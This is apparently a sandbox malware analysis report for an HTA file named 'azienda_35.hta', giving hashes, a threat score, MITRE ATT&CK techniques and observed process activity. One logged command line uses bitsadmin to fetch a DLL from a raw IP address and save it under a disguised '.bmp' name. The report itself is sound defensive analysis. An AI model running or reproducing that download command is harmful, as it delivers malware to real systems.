880ebf5a3d74cf9781321ae84c77dd49cb27603bfc85a133e3bf940cb1744ac2

Analysis

max time kernel
127s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
08/02/2023, 04:07

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

azienda_35.hta
Size

6KB
MD5

6627612314308237e214d6101125bb42
SHA1

5639b5fd391f0a7a7ea15fffca349f340c352cfe
SHA256

7cefc61d74c269fe571515a9be34a76b239abed349335a79e60fc923aa619030
SHA512

b68a08a167cde5b3ad3afac9728de2f5f09c66f5100262fabd87557e0c80228a008d3a9ad98831e58aa9bab90391882a0891243fa1f5af23dc3dff943ebf2923
SSDEEP

96:wDBFi3MLVTUoPg2pwTEeD4b7KdaO3iOaLt3M8Mn3XTPMJsb0ODcFE+Voq3V4d292:K/U77rIKdn863jMM0OD9+VVF44xikuj

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 5 IoCs

flow	pid	Process
5	736	mshta.exe
7	736	mshta.exe
16	736	mshta.exe
19	736	mshta.exe
21	736	mshta.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	mshta.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
4624	bitsadmin.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 736 wrote to memory of 4624	736	mshta.exe	84
PID 736 wrote to memory of 4624	736	mshta.exe	84
PID 736 wrote to memory of 4624	736	mshta.exe	84

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\azienda_35.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:736
- C:\Windows\SysWOW64\bitsadmin.exe
  "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://62.173.147.3/azienda.dll C:\Windows\\System32\\LogFiles\\\login.bmp
  2⤵
  - Download via BitsAdmin
  PID:4624

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

BITS Jobs

T1197

Privilege Escalation

Defense Evasion

BITS Jobs

T1197

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads